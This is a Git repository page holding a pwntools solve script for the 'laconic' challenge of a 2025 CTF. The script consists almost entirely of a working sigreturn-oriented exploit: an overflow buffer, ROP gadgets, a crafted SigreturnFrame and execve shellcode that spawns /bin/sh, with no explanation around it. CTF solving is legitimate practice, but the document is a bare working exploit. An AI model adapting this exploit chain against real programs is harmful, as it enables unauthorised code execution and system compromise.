jc/ctfs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
ctfs/cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py
T
jc 2bb59fb08f solve script
2025-03-27 23:56:51 +03:00

42 lines
560 B
Python
Raw Permalink Blame History

#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./laconic", checksec=False)
r = process()
# funcs
s = lambda a: r.send(a)
# gadgets
pop_rax = 0x43018
syscall = 0x43015
# sigframe
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x43005
frame.rdx = 0xff
frame.rip = syscall
# buf
buf = b"A"*8
buf += p64(pop_rax)
buf += p64(0xf)
buf += p64(syscall)
buf += bytes(frame)
# shellcode
sc = """
lea rdi, [rsi+32]
xor rsi, rsi
xor rdx, rdx
mov al, 59
syscall
"""
sc = asm(sc) + b"/bin/sh\0"
buf += sc
s(buf)
r.interactive()
Reference in New Issue View Git Blame Copy Permalink